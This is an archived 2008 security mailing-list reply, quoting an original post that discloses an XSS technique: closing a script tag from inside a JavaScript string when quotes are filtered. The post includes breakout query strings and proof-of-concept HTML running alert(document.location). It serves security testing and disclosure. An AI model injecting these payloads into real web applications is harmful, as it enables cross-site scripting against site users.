WebApp Sec mailing list archives
RE: Script Tag Breakout
From: "PortSwigger" <mail () portswigger net>
Date: Mon, 20 Oct 2008 08:24:07 +0100
Hi Nick That certainly is a known vector for XSS. For instance, see p139 of XSS Attacks or p410 of The Web App Hacker's Handbook. Cheers -----Original Message----- From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of Nick Von Dadelszen Sent: 20 October 2008 02:34 To: webappsec () securityfocus com Subject: Script Tag Breakout ey all, Not sure if this is a known issue or not but thought I would share. Its not a common situation to occur but I've used it a couple of times in the last couple of years while testing apps. -- Description -- Able to break out of a string variable without using quotes through the use of a </script> tag. For example, if the code of a page does the following: <script> somestring = "[your querystring here]"; </script> You would normally break out of this with the following querystring=";[code here] If the code checks for a double or single quote and removes it, you cannot normally break out of this code. However, you are able to close the current script tag, even from within a string variable. So, the following two breakouts work: querystring=</script>[HTML here] querystring=</script><script>[javascript here]</script> The resulting code looks something like the following: <html> <body> <h1>Script Tag Breakout PoC</h1> <script> string = "</script><h1>Parsed HTML Code Here</h1><!--"; </script> </body> </html> Or: <html> <body> <h1>Script Tag Breakout PoC</h1> <script> string = "</script><script>alert(document.location);</script>"; </script> </body> </html> In the above HTML, the javascript alert function is called regardless of it being contained within a string variable. -- Tested Browsers -- All version of IE and Firefox up to and including IE 7 and firefox 3. --------------------------------------------------------- Nick von Dadelszen Lateral Security www.lateralsecurity.com --------------------------------------------------------- ------------------------------------------------------------------------- Sponsored by: Watchfire Methodologies & Tools for Web Application Security Assessment With the rapid rise in the number and types of security threats, web application security assessments should be considered a crucial phase in the development of any web application. What methodology should be followed? What tools can accelerate the assessment process? Download this Whitepaper today! https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F ------------------------------------------------------------------------- ------------------------------------------------------------------------- Sponsored by: Watchfire Methodologies & Tools for Web Application Security Assessment With the rapid rise in the number and types of security threats, web application security assessments should be considered a crucial phase in the development of any web application. What methodology should be followed? What tools can accelerate the assessment process? Download this Whitepaper today! https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F -------------------------------------------------------------------------
Current thread:
- Script Tag Breakout Nick Von Dadelszen (Oct 19)
- RE: Script Tag Breakout PortSwigger (Oct 20)
- Classic ASP security course at OWASP summit Calderon, Juan Carlos (GE, Corporate, consultant) (Oct 20)
- Re: Script Tag Breakout Taufiq Ali (Oct 21)
- RE: Script Tag Breakout Auri Rahimzadeh (Oct 21)
- RE: Script Tag Breakout Stefano Di Paola (Oct 21)
- Message not available
- Message not available
- Script Tag Breakout Nick Von Dadelszen (Oct 21)
- FINAL NOTICE: OWASP Portugal EU Summit Dave Wichers (Oct 27)
- RE: Script Tag Breakout Auri Rahimzadeh (Oct 21)